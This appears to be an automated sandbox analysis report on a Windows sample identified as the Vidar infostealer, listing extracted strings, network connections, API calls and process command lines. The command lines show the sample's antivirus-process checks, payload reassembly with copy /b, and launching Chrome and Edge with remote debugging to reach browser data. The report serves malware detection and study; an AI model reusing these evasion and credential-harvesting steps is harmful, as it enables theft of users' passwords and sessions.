                Source: chrome.exe, 00000012.00000002.2809863625.0000278000478000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
                Source: chrome.exe, 00000012.00000003.2767384010.000027800140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
                Source: chrome.exe, 00000012.00000003.2739029225.0000278000310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=$
                Source: chrome.exe, 00000012.00000002.2810055623.00002780004DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
                Source: chrome.exe, 00000012.00000002.2810055623.00002780004DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/tools/feedback/chrome/__submitage.Incoming.ThirdPartyToThirdParty.SameBucketX
                Source: chrome.exe, 00000012.00000002.2812095120.0000278000A64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/undo
                Source: chrome.exe, 00000012.00000003.2756652980.00002780002A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.comAccess-Control-Allow-Credentials:
                Source: chrome.exe, 00000012.00000002.2808273997.0000278000014000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/
                Source: chrome.exe, 00000012.00000003.2767384010.000027800140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/aida2
                Source: chrome.exe, 00000012.00000003.2770867030.00002780016D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2770893240.00002780016DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager
                Source: chrome.exe, 00000012.00000003.2767384010.000027800140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
                Source: chrome.exe, 00000012.00000003.2767384010.000027800140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
                Source: chrome.exe, 00000012.00000002.2809048837.000027800020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
                Source: chrome.exe, 00000012.00000002.2809048837.000027800020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
                Source: chrome.exe, 00000012.00000002.2809048837.000027800020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v4/token
                Source: chrome.exe, 00000012.00000002.2809048837.000027800020C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2739003701.0000278000C2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2735408123.0000278000C30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
                Source: chrome.exe, 00000012.00000002.2810228742.0000278000561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
                Source: chrome.exe, 00000012.00000002.2810228742.0000278000561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                Source: chrome.exe, 00000012.00000002.2810055623.00002780004DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
                Source: chrome.exe, 00000012.00000003.2776169900.0000278001CE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
                Source: chrome.exe, 00000012.00000003.2775586059.0000278001C58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2775032657.0000278001CD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2775950748.0000278001C28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2775735731.0000278001C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2820062825.0000278001C60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2776169900.0000278001CE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
                Source: chrome.exe, 00000012.00000003.2775654512.0000278001C44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2788157585.0000278000DB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2774896977.0000278001CBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2776169900.0000278001CE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.otmEBJ358uU.2019.O/rt=j/m=q_dnp
                Source: chrome.exe, 00000012.00000003.2775654512.0000278001C44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2788157585.0000278000DB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2774896977.0000278001CBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2776169900.0000278001CE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd
                Source: Billion.com, 0000000C.00000002.3333594942.0000000006303000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
                Source: Billion.com, 0000000C.00000002.3333594942.0000000006303000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
                Source: Billion.com, 0000000C.00000002.3333594942.0000000006303000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: PodcastsTries.exeString found in binary or memory: https://www.ssl.com/repository0
                Source: Billion.com, 0000000C.00000002.3328091669.00000000042DD000.00000004.00000800.00020000.00000000.sdmp, Billion.com, 0000000C.00000002.3331378130.0000000006194000.00000004.00000800.00020000.00000000.sdmp, HDJEU3.12.drString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
                Source: chrome.exe, 00000012.00000002.2810820713.00002780006FD000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2722834070.000027800056C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810140682.000027800053B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/:
                Source: chrome.exe, 00000012.00000002.2810820713.00002780006FD000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2722834070.000027800056C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810140682.000027800053B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca
                Source: chrome.exe, 00000012.00000002.2810820713.00002780006FD000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2722834070.000027800056C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810140682.000027800053B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J
                Source: chrome.exe, 00000012.00000002.2809276901.00002780002D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810820713.00002780006FD000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2722834070.000027800056C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810140682.000027800053B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
                Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
                Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50075 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50052 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
                Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
                Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
                Source: unknownNetwork traffic detected: HTTP traffic on port 50087 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
                Source: unknownNetwork traffic detected: HTTP traffic on port 50117 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
                Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                Source: unknownNetwork traffic detected: HTTP traffic on port 50029 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
                Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50110 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
                Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
                Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
                Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
                Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
                Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
                Source: unknown HTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49715 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49731 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49780 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49792 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 188.245.216.205:443 -> 192.168.2.6:49800 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49841 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49936 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:50110 version: TLS 1.2
                Source: C:\Users\user\Desktop\PodcastsTries.exe Code function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050F9
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Code function: 12_2_001AF7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,12_2_001AF7C7
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Code function: 12_2_001AF55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,12_2_001AF55C
                Source: C:\Users\user\Desktop\PodcastsTries.exe Code function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Code function: 12_2_001C9FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,12_2_001C9FD2

                System Summary

                Source: 12.2.Billion.com.4390000.1.unpack, type: UNPACKEDPE Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Process Stats: CPU usage > 49%
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Code function: 12_2_0014FFE0 CloseHandle,NtProtectVirtualMemory,12_2_0014FFE0
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Code function: 12_2_001A4763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,12_2_001A4763
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Code function: 12_2_00191B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,12_2_00191B4D
                Source: C:\Users\user\Desktop\PodcastsTries.exe Code function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_004038AF
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Code function: 12_2_0019F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,12_2_0019F20D
                Source: C:\Users\user\Desktop\PodcastsTries.exe File created: C:\Windows\RespectExperiments
                Source: C:\Users\user\Desktop\PodcastsTries.exe File created: C:\Windows\ClosureSurge
                Source: C:\Users\user\Desktop\PodcastsTries.exe File created: C:\Windows\CollectiblesFerrari
                Source: C:\Users\user\Desktop\PodcastsTries.exe File created: C:\Windows\SandSublimedirectory
                Source: C:\Users\user\Desktop\PodcastsTries.exe File created: C:\Windows\CorruptionEssential
                Source: C:\Users\user\Desktop\PodcastsTries.exe File created: C:\Windows\ReservedSlovenia
                Source: C:\Users\user\Desktop\PodcastsTries.exe File created: C:\Windows\ChartAccessible
                Source: C:\Users\user\Desktop\PodcastsTries.exe File created: C:\Windows\PriestRussian
                Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\680662\Billion.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Code function: String function: 00150DA0 appears 46 times
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Code function: String function: 0014FD52 appears 40 times
                Source: C:\Users\user\Desktop\PodcastsTries.exe Code function: String function: 004062CF appears 58 times
                Source: PodcastsTries.exe Static PE information: invalid certificate
                Source: PodcastsTries.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 12.2.Billion.com.4390000.1.unpack, type: UNPACKEDPE Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
                Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@104/289@25/16
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Code function: 12_2_001A41FA GetLastError,FormatMessageW,12_2_001A41FA
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Code function: 12_2_00192010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,12_2_00192010
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Code function: 12_2_00191A0B AdjustTokenPrivileges,CloseHandle,12_2_00191A0B
                Source: C:\Users\user\Desktop\PodcastsTries.exe Code function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Code function: 12_2_0019DD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,12_2_0019DD87
                Source: C:\Users\user\Desktop\PodcastsTries.exe Code function: 0_2_004024FB CoCreateInstance,0_2_004024FB
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Code function: 12_2_001A3A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,12_2_001A3A0E
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\G7MTMI1G.htm
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6928:120:WilError_03
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7812:120:WilError_03
                Source: C:\Users\user\Desktop\PodcastsTries.exe File created: C:\Users\user\AppData\Local\Temp\nsf49A9.tmp
                Source: PodcastsTries.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
                Source: C:\Users\user\Desktop\PodcastsTries.exe File read: C:\Users\desktop.ini
                Source: C:\Users\user\Desktop\PodcastsTries.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: chrome.exe, 00000012.00000002.2810140682.000027800053B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
                Source: QIWBS2NOP.12.dr, 6XLN7YM7G.12.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: C:\Users\user\Desktop\PodcastsTries.exe File read: C:\Users\user\Desktop\PodcastsTries.exe
                Source: unknown Process created: C:\Users\user\Desktop\PodcastsTries.exe "C:\Users\user\Desktop\PodcastsTries.exe"
                Source: C:\Users\user\Desktop\PodcastsTries.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Assessing Assessing.cmd & Assessing.cmd
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 680662
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Memo
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "OBTAINING" Compensation
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Honey + ..\Biotechnology + ..\Enzyme + ..\Harvard T
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\680662\Billion.com Billion.com T
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2344 --field-trial-handle=2236,i,6734849523328560890,2082883044191278633,262144 /prefetch:8
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2704 --field-trial-handle=2644,i,11626362328839299317,9747645851488831929,262144 /prefetch:3
                Source: unknown Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2096 --field-trial-handle=2052,i,17749502471063055911,16474361137930384879,262144 /prefetch:3
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2708 --field-trial-handle=2412,i,5564331809908688110,6573540988472131423,262144 /prefetch:3
                Source: unknown Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=1992,i,15107475950589373331,2325899341501717077,262144 /prefetch:3
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6356 --field-trial-handle=1992,i,15107475950589373331,2325899341501717077,262144 /prefetch:8
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6704 --field-trial-handle=1992,i,15107475950589373331,2325899341501717077,262144 /prefetch:8
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6980 --field-trial-handle=1992,i,15107475950589373331,2325899341501717077,262144 /prefetch:8
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6980 --field-trial-handle=1992,i,15107475950589373331,2325899341501717077,262144 /prefetch:8
